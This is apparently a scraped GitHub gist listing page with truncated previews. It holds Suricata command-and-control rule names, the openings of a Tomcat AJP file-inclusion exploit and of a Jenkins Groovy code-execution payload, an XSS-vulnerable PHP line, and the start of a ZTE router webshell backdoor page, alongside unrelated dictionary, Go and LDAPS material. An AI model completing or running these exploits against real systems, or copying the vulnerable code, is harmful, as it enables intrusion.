xax007 / Suricata_Rules_Descriptionaa
Created June 3, 2019 05:27
SURICATA Applayer Mismatch protocol both directions
SURICATA Applayer Wrong direction first Data
SURICATA Applayer Detect protocol only one direction
SURICATA Applayer Protocol detection skipped
SURICATA Applayer Unexpected protocol
ET CNC Shadowserver Reported CnC Server Port 80 Group 1
ET CNC Shadowserver Reported CnC Server Port 81 Group 1
ET CNC Shadowserver Reported CnC Server Port 443 Group 1
xax007 /
Last active February 4, 2021 10:29
xax007 /
Created February 23, 2020 15:00
Apache Tomcat AJP local file include and code execution exploit
#!/usr/bin/env python
#Tomcat-Ajp lfi
import struct
# Some references:
# [url][/url]
def pack_string(s):
    if s is None:
        return struct.pack(">h", -1)
    l = len(s)
xax007 /
Last active November 20, 2019 16:30


Cross-site scripting (XSS) vulnerability in file app/xml_cdr/xml_cdr_search.php line 63 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.

    if (strlen(check_str($_GET['redirect'])) > 0) {
        echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
xax007 /
Created May 5, 2019 06:43 — forked from josephg/
Apple dictionaries
# Thanks to commenters for providing the base of this much nicer implementation!
# Save and run with $ python
# You may need to hunt down the dictionary files yourself and change the awful path string below.
# This works for me on MacOS 10.14 Mojave
from struct import unpack
from zlib import decompress
import re
filename = '/System/Library/Assets/com_apple_MobileAsset_DictionaryServices_dictionaryOSX/9f5862030e8f00af171924ebbc23ebfd6e91af78.asset/AssetData/Oxford Dictionary of English.dictionary/Contents/Resources/'
f = open(filename, 'rb')
View newol.dat
This file has been truncated, but you can view the full file.
xax007 /
Created April 11, 2019 02:30 — forked from asukakenji/
Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.8.3 darwin/amd64.

A list of valid GOOS values

(Bold = supported by go out of the box, i.e. without the help of a C compiler, etc.)

  • android
  • darwin
xax007 /
Created March 16, 2019 09:09 — forked from Tom4t0/
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.

By default, Microsoft Active Directory servers will offer LDAP connections over unencrypted connections (boo!).

The steps below will create a new self-signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor-purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
class Dummy{ }
xax007 / web_shell_cmd.gch
Created November 30, 2018 11:32
R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""">
<html xmlns="">
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
F460 Webshell